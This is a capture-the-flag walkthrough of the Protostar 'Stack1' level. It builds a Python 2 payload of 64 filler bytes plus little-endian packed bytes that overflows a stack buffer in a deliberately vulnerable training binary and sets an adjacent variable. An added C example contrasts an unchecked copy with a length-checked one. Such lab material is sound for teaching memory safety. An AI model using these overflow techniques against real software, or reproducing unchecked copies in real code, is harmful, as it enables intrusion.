Protostar 0x01 - Stack1

Prev: 0x00 - Stack0
Next: 0x02 - Stack2

When we check the source code for this level, we notice that it's very similar to the previous level, but with two differences: first, our input is passed as a command-line argument rather than requested via "gets," and second, rather than simply changing the "modified" variable, we must overwrite it with "0x61626364."


You may recognize the ASCII equivalents of those hex values and be inclined to pass them in as letters, but we will pass them in as hex. To do this, we will build a Python file using the Nano text editor, which is very lightweight. First, however, we'll want to move to the /tmp folder where we have more permissions, and bring a copy of "stack1" with us. Then, enter "nano stack1.py" to create a new file and open it in Nano.


$ cp stack1 /tmp
$ cd /tmp
$ ls
stack1
$ nano stack1.py 


We'll begin by importing the "struct" package, which will allow us to pack the requested bytes in little-endian format. This may seem like overkill for just these four bytes, but it is a package that will help us more later on.

Next, we'll create our buffer of 64 "A" bytes. Then, we'll use "struct.pack" to properly organize the requested bytes. The "<" character will be used in the format argument to designate little-endian, followed by "I" to indicate the data type is unsigned int. Finally, we'll concatenate the buffer and the requested bytes, and print.


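import struct

# Python 2 script (note the print statement below)
buffer = "A" * 64                          # 64 filler bytes
modified = struct.pack("<I", 0x61626364)   # "<" = little-endian, "I" = unsigned int
payload = buffer + modified                # filler first, then the four packed bytes

print payload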


Let's test this before passing into the program:


$ python stack1.py
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdcba 


Great! We've got our 64 A's followed by the ASCII representation of the requested bytes in little-endian: 0x61 is "a," 0x62 is "b," etc. We just need to pass it into the stack1 program to confirm we've completed the objective.


$ ./stack1 `python stack1.py`
you have correctly got the variable to the right value 
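To see why the four bytes "dcba" after the filler read back as 0x61626364, and what a length check changes, here is an added example that is not the level's source or code from the original page. The struct layout (a 64-byte buffer directly followed by "modified") and the names frame, le32, copy_unchecked and copy_checked are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout: the page only tells us 64 filler bytes reach "modified". */
struct frame {
    char     buffer[64];
    uint32_t modified;
};
_Static_assert(offsetof(struct frame, modified) == 64, "modified follows buffer");

/* Read 4 bytes the way a little-endian CPU does: lowest address = low byte. */
static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Models a copy with no length check. Copying into the whole struct keeps
   the model itself well-defined; the length is clamped to the model's size. */
static uint32_t copy_unchecked(const char *arg)
{
    struct frame f;
    size_t n = strlen(arg);
    memset(&f, 0, sizeof f);                 /* modified starts at 0 */
    memcpy(&f, arg, n < sizeof f ? n : sizeof f);
    return le32((const unsigned char *)&f.modified);
}

/* Hardened form: reject input that does not fit the buffer plus its NUL. */
static int copy_checked(const char *arg, uint32_t *modified_out)
{
    struct frame f;
    size_t n = strlen(arg);
    memset(&f, 0, sizeof f);
    if (n >= sizeof f.buffer)
        return -1;
    memcpy(f.buffer, arg, n + 1);
    *modified_out = le32((const unsigned char *)&f.modified);
    return 0;
}

int main(void)
{
    char arg[69];
    uint32_t m = 0;
    memset(arg, 'A', 64);
    memcpy(arg + 64, "dcba", 5);             /* same bytes the page's script prints */
    printf("unchecked: modified = 0x%08x\n", (unsigned)copy_unchecked(arg));
    printf("checked:   %s\n", copy_checked(arg, &m) ? "rejected" : "accepted");
    return 0;
}
```

Passing the letters in reading order ("abcd") instead would leave the value as 0x64636261, which is why the script packs the bytes with "<I".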


